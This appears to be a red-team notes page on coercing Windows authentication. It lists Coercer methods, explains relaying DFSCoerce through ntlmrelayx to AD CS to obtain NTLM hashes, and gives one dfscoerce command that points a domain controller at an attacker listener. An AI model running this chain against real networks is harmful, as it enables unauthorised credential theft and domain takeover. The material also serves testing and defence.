Secondary Categories: 02-Lateral Movement, 02-Privilege Escalation, 02-Credential Access
Coercing Authentication from internal systems is usually pretty successful on past engagements.
Coercer
This tool will automatically coerce a Windows server to authenticate to a arbitrary machine through using the following methods:
- PrinterBug on MS-RPRN
- PetitPotam on MS-EFSR
- ShadowCoerce on MS-FSRVP
- DFSCoerce on MS-DFSNM
- CheeseOunce on MS-EVEN
DFSCoerce
This method is very successful and leverages the MS-DFSNM protocol to force the domain controller to authenticate to a specified IP address.
This can be coupled with ntlmrelayx to relay to other services like AD CS to obtain a certificate and ultimately retrieve NTLM hashes.
python3 dfscoerce.py -u jsmith -d corp.local $dc $listener
Resources:
| Title | URL |
|---|---|
| MITRE - Forced Authentication | https://attack.mitre.org/techniques/T1187 |
| DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |
| Coercer | https://github.com/p0dalirius/Coercer |
Also Check Out:
- PLACEHOLDER